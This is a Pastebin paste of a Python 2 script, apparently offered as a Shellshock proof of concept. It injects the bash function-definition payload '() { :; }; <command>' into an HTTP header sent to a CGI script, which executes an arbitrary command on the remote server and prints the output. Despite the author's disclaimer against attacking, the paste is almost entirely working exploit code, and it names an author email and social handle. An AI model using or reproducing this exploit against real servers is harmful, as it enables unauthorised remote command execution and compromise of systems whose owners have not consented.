Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import httplib
- import urllib
- import sys
- url = "/cgi-bin/"; #! Vul. Server.
- dir = "/cgi-bin/cmo_cmo.sh"; #! Directory
- cmd = "/bin/ls -l";#!Command to execute on remote server. [EX. /usr/bin/id ]
- #!
- #! Author : Tanmay [ 13lackD3M0n ]
- #! Script : Sh3ll Sh0ck Expl0it3r
- #! EMAIL : kevinmetnik606@gmail.com
- #! Facebook : tanmay606
- #! I Respect SEcurity.....
- try:
- from colorama import Fore,Back;
- except ImportError:
- print "\n[1] Colorama package not installed. [ DO it First ]";
- print "\n[2] WINNT not supported";
- sys.exit(1);
- def _banner_():
- print (Fore.GREEN+"\n\t-> Author : Tanmay [ 13lackD3m0n ]");
- print "\t-> Script : Shell Sh0cK Inj3cT0r";
- print "\t-> Facebook : tanmay606"
- print(Fore.RED+"\t-> We Respect SEcurity { ScRipt F0r Null-Byte }\n\n"+Fore.RESET);
- print "\t [~] Use of this script for attacking is not allow.[~]"
- print "\t [~] Author [ Tanmay ] is not responsible for any harm [~]"
- print "\t[~]This script is written as POC for shellshock vulnerabality [~]\n\n"
- _banner_();
- if("http://" in url):
- url = url.replace("http://","");
- elif("https://" in url):
- url = url.replace("https://","");
- else:
- pass
- conn = httplib.HTTPConnection(url)
- command="() { :; }; %s" %cmd
- headers = {"Content-type": "application/x-www-form-urlencoded",
- "exploit":command }
- conn.request("GET",dir,headers=headers)
- res = conn.getresponse()
- print "Reply Status : %s"%res.status
- print "Reply : %s"%res.reason
- data = res.read()
- if data < 1:
- print "Error : [ Not Vulnerable ] No data recived."
- sys.exit(1);
- else:
- print(Fore.BLUE+data+Fore.RESET);
- #!13lackD3m0n
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
